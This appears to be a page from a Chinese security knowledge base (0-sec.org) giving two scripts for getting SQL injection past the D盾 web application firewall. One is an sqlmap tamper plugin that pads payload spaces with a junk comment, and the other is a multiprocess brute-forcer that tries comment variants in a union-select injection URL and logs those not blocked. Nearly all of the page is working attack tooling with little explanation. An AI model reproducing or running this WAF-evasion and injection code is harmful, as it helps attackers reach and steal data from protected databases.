sqlmap bypass d盾 tamper

#!/usr/bin/env python

from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW
def dependencies():
    pass

def tamper(payload, **kwargs):
    """
            BYPASS Ddun
    """
    retVal = payload
    if payload:                                                                               
        retVal = "" 
        quote, doublequote, firstspace = False, False, False
        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += "/*DJSAWW%2B%26Lt%3B%2B*/"
                    continue
            elif payload[i] == '\'':
                quote = not quote
            elif payload[i] == '"':
                doublequote = not doublequote
            elif payload[i] == " " and not doublequote and not quote:
                retVal += "/*DJSAWW%2B%26Lt%3B%2B*/"
                continue
            retVal += payload[i]
    return retVal

需改修改url

#@author:九世
#@time:2019/11/15
#@file:bypass.py
from gevent import monkey;monkey.patch_all()
from multiprocessing import Process
from colorama import init,Fore
import gevent
import requests
import time
import asyncio
import string

init(wrap=True)

class BypassDog(object):
    def __init__(self):
        self.data=string.digits+'!' #定义内容
        self.payload='http://192.168.241.158/sql.php?id=0%20union%20select%201,2'
        self.ybs=[]
        self.djcs=[]
        self.xcs=[]
        self.calc=0
        self.calc2=0
        self.calc3=0
        self.huan='  '
        self.dr=''
        self.r=''

    def reqts(self,da):
        jg=self.payload.replace('%20','/*{}*/'.format(da))
        try:
            rqt=requests.get(url=jg,headers={'user-agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36'})
            if not '网站防火墙' in rqt.text and not 'NULL' in rqt.text:
                print(Fore.GREEN+'[+] '+Fore.WHITE+' Bypass Dog url:{}'.format(jg))
                print(jg,file=open('test.txt','a',encoding='utf-8'))
                exit()
            else:
                print(Fore.RED+'[-] '+Fore.WHITE+' Bypass Dog fuck url:{}'.format(jg))
        except:
            pass

    def xc(self,rw):
        for g in rw:
            self.xcs.append(gevent.spawn(self.reqts,g))

        gevent.joinall(self.xcs)
        self.xcs.clear()


    def djc(self):
        for u in self.ybs:
            if self.calc==100:
                p=Process(target=self.xc,args=(self.djcs,))
                p.start()
                self.calc=0
                self.djcs.clear()

            time.sleep(0.01) #0.01 CPU低于50% 0.005CPU低于70 0.003CPU低于95,根据内容数量来手动设置是否需要延时
            self.djcs.append(u)
            self.calc+=1

        if len(self.djcs)>0:
            p = Process(target=self.xc, args=(self.djcs,))
            p.start()
            self.calc = 0
            self.djcs.clear()

    async def yb(self):
        for g in range(1,len(self.data)+1):
            while True:
                if self.calc3>g:
                    gd=self.dr+'    pod={};self.ybs.append(pod);self.calc2+=1\n{}' \
                               'if self.calc2==100:\n{}' \
                               '    self.djc()\n{}self.calc2=0\n{}self.ybs.clear()\n' \
                               'if len(self.ybs)>0:\n' \
                               '    self.djc();self.calc2=0;self.ybs.clear()'.format(self.r.rstrip('+'),self.huan+'   ',self.huan+'   ',self.huan+'   '+'    ',self.huan+'   '+'    ')
                    exec(gd)
                    self.calc3=0
                    self.huan=' '
                    self.dr=''
                    break
                else:
                    self.dr+="for s{} in self.data:\n{}".format(self.calc3,self.huan)
                    self.r+='s{}+'.format(self.calc3)
                    self.calc3+=1
                    self.huan+=' '


if __name__ == '__main__':
    obj=BypassDog()
    loop=asyncio.get_event_loop()
    tk=loop.create_task(obj.yb())
    loop.run_until_complete(tk)
零组资料文库 all right reserved,powered by 0-sec.org未经授权禁止转载 2019-11-28 11:39:20

results matching ""

    No results matching ""